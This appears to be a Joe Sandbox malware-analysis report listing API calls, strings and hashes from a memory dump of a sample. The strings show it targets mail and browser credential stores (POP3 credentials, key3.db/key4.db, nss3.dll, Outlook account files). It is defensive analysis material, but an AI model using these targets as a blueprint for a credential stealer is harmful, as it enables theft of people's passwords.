                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,7576E430,?), ref: 004081B9
                                                                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                                                                    • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                                                    • API String ID: 524865279-2190619648
                                                                                                                                                                                                                                    • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                                                                                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406BFF
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406C0D
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                                                                    • String ID: key3.db$key4.db
                                                                                                                                                                                                                                    • API String ID: 581844971-3557030128
                                                                                                                                                                                                                                    • Opcode ID: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                                                                                                                                                                    • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                                                                    • API String ID: 2300387033-3849865405
                                                                                                                                                                                                                                    • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                                                                                    • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                                                                    • String ID: %s (%s)
                                                                                                                                                                                                                                    • API String ID: 3756086014-1363028141
                                                                                                                                                                                                                                    • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                                                                                    • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                                    • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                                                                    • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                                    • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                                                                    • API String ID: 1640410171-3316789007
                                                                                                                                                                                                                                    • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                                                                                                    • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                                                                    • API String ID: 125969286-791839006
                                                                                                                                                                                                                                    • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                                                                                                                                    • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                                                                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                                                                                                                                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                                                                                                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                                      • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                                                                    • String ID: ACD
                                                                                                                                                                                                                                    • API String ID: 1886237854-620537770
                                                                                                                                                                                                                                    • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                                                                                                                                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004091EC
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                                                                                      • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                                                                                      • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                                                                      • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                                                                    • String ID: caption$dialog_%d
                                                                                                                                                                                                                                    • API String ID: 2923679083-4161923789
                                                                                                                                                                                                                                    • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                                                                                                                                    • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • unknown error, xrefs: 004277B2
                                                                                                                                                                                                                                    • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                                                                    • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                                                                    • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                                                                                    • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                    • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                                                                    • API String ID: 3510742995-3035234601
                                                                                                                                                                                                                                    • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                                                                    • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                    • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                                    • API String ID: 2221118986-3608744896
                                                                                                                                                                                                                                    • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                                                                    • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                                                                                                                                      • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcmpmemcpy
                                                                                                                                                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                                                                    • API String ID: 1784268899-4153596280
                                                                                                                                                                                                                                    • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                                                                    • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410246
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410258
                                                                                                                                                                                                                                      • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3974772901-0
                                                                                                                                                                                                                                    • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                                                                                                                                    • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                                                                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 577244452-0
                                                                                                                                                                                                                                    • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                                                                                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                                                                    • String ID: imap$pop3$smtp
                                                                                                                                                                                                                                    • API String ID: 2025310588-821077329
                                                                                                                                                                                                                                    • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
